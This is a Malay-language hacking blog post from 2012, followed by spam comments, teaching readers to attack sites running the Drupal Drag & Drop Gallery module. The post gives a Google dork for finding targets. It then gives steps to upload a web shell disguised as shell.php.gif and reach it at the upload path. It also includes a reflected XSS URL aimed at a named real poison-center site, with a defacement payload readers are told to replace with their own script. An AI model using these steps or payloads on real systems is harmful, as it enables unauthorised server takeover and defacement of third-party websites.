Monday, 25 June 2012

Drupal Modules - Drag & Drop Gallery File Upload & XSS Vulnerability



Assalamualaikum dan salam sejahtera.Lama aku tak post tentang exploit upload2 kan?Ok jom aku ajar exploit file upload baru.exploit ni jugak vulnerable terhadap XSS ^.^
Jom mula.

1. Mula-mula search google dork ni :
inurl:/sites/all/modules/dragdrop_gallery/



2. Pilih salah satu website.Seterusnya sediakan shell korang dalam bentuk shell.php.gif


kemudian UPLOAD!


3. Untuk access shell pergi sini :
http://localhost/drupal/sites/all/modules/dragdrop_gallery/shell.php.gif



4. DONE!

5. Ok sekarang untuk XSS pulak macam ni :
http://illinoispoisoncenter.org/sites/all/modules/dragdrop_gallery/upload.php?filedir=/sites/default/files/dragdrop_gallery&nid=<marquee>Rea_pErz+Was+Here</marquee>

6. Tukar script warna merah tu kepada script korang sendiri!SIAP!


Ok itu saja Assalamualaikum....

Item Reviewed: Drupal Modules - Drag & Drop Gallery File Upload & XSS Vulnerability Description: Rating: 5 Reviewed By Unknown

Share:

4 comments:

  1. http://silvertag-fm.tk
    link anda telah berada didalam web radio kami
    sharing is caring

    ReplyDelete
  2. led tube manufacturer by were called to by shopmen, anxious after, he sent for a priest from
    distances, both from the Nile and from the Red Sea, together with

    My website :: led lights manufacturer
    Here is my webpage - led lights manufacturer

    ReplyDelete
  3. First off I would like to say great blog!
    I had a quick question which I'd like to ask if you don't
    mind. I was curious to find out how you center yourself and clear your thoughts before writing.
    I've had trouble clearing my mind in getting my thoughts out there. I truly do take pleasure in writing however it just seems like the first 10 to 15 minutes are usually wasted simply just trying to figure out how to begin. Any suggestions or hints? Kudos!

    Here is my website ... getting pregnant

    ReplyDelete

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com